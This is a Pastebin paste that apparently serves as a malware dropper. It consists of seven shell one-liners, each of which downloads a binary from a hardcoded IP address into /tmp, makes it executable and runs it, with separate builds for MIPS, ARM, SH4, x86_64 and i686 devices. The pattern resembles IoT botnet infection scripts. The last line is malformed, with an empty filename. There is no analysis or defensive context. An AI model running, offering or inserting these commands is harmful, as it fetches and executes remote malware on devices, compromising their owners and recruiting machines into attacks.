Advertisement
Guest User

Nöt

a guest
Oct 25th, 2015
9
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.55 KB | None | 0 0
  1. cd /tmp && wget -q http://173.242.117.89/Sharky/mipsel && chmod +x mipsel && ./mipsel
  2. cd /tmp && wget -q http://173.242.117.89/Sharky/mips && chmod +x mips && ./mips
  3. cd /tmp && wget -q http://173.242.117.89/Sharky/sh4 && chmod +x sh4 && ./sh4
  4. cd /tmp && wget -q http://173.242.117.89/Sharky/x86_64 && chmod +x x86_64 && ./x86_64
  5. cd /tmp && wget -q http://173.242.117.89/Sharky/armv6l && chmod +x armv6l && ./armv6l
  6. cd /tmp && wget -q http://173.242.117.89/Sharky/i686 && chmod +x i686 && ./i686
  7. cd /tmp && wget -q http://173.242.117.89/Sharky/ && chmod +x && ./
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement